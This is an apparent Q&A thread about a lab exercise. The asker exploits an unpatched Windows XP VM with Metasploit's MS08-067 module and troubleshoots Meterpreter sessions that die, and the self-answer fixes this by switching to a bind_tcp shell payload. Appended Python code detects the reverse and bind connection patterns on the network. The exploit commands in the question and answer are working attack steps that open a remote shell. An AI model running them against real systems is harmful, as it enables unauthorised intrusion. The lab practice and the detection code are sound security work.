
I've got an SP0/unpatched Windows XP which is vulnerable to the Conficker worm. I'm using metasploit to use the Conficker exploit with the purpose of opening a remote shell/command line.

My Metasploit script is the following one:

use exploit/windows/smb/ms08_067_netapi
set RHOST <vulnerable_win_xp_ip>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacking_kali_host_ip>
set LPORT <local_port>
exploit -j -z

In my case, I have machines with addresses in 192.168.239.* and LPORT = 443.

In this way, I should be able to open a session with the remote vulnerable machine (sessions -i 1), thus executing the command line application (execute -i -f cmd.exe) and obtaining a remote command line.

Nevertheless, when I execute the script, although I get Meterpreter opening a session with the victim, this session is closed (Reason: Died) after a few seconds.

I've found that it could be related to the fact I'm using two VMWare Virtual Machines during my test.
As suggested, I tried with set InitialAutoRunScript migrate -f, but nothing changes.

How can I prevent Meterpreter sessions from being closed?
And, most importantly, why are they closed?

auino

1 Answer


I've solved it by varying the payload used by Metasploit. In particular, using the bind_tcp payload, Meterpreter connections are no longer closed after a few seconds, and I obtain a remote shell/command line.

use windows/smb/ms08_067_netapi
set PAYLOAD windows/shell/bind_tcp
set RHOST <vulnerable_win_xp_ip>
show targets
set TARGET <n>
run

In my case <n> = 2, but in general it depends on the previous step.

auino
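On the wire, the two payloads in this thread differ in connection direction: with reverse_tcp the XP host connects back to LHOST:LPORT, while with bind_tcp the other host connects to a new listener on the XP host. The following is an added example, not part of the original posts, showing detection logic that flags either pattern right after an SMB connection. The Flow record layout, the 30-second window, the baseline port set and port 4444 are assumptions, and the sample records are constructed.

```python
from collections import namedtuple

# One record per new TCP connection (hypothetical layout for this example).
Flow = namedtuple("Flow", "ts src dst dport")

SMB_PORT = 445
WINDOW = 30  # seconds after the SMB connection to look for a follow-up (assumed)

# Constructed sample records; addresses use the question's 192.168.239.* range.
SAMPLE_FLOWS = [
    Flow(100, "192.168.239.10", "192.168.239.20", 445),   # SMB to the XP host
    Flow(103, "192.168.239.20", "192.168.239.10", 443),   # XP host connects back
    Flow(500, "192.168.239.10", "192.168.239.21", 445),   # SMB to a second host
    Flow(504, "192.168.239.10", "192.168.239.21", 4444),  # new listener reached
    Flow(900, "192.168.239.30", "192.168.239.22", 445),   # ordinary file sharing
    Flow(905, "192.168.239.30", "192.168.239.22", 139),   # baseline service port
]

def find_post_smb_sessions(flows, baseline_ports=frozenset({135, 139, 445}),
                           window=WINDOW):
    """Return (kind, smb_flow, follow_up_flow) for each suspicious pair."""
    flows = sorted(flows, key=lambda f: f.ts)
    alerts = []
    for smb in (f for f in flows if f.dport == SMB_PORT):
        for f in flows:
            if not (smb.ts < f.ts <= smb.ts + window):
                continue
            if f.src == smb.dst and f.dst == smb.src:
                # The SMB server opens a connection back to its own client.
                alerts.append(("reverse", smb, f))
            elif (f.src, f.dst) == (smb.src, smb.dst) and f.dport not in baseline_ports:
                # The same client reaches a port the server does not normally serve.
                alerts.append(("bind", smb, f))
    return alerts

if __name__ == "__main__":
    for kind, smb, follow in find_post_smb_sessions(SAMPLE_FLOWS):
        print(f"{kind:7} {smb.src} -> {smb.dst}:{smb.dport}, "
              f"then {follow.src} -> {follow.dst}:{follow.dport}")
```

The baseline port set should come from what each host is actually known to serve; a fixed set like the one here will miss listeners placed on a baseline port.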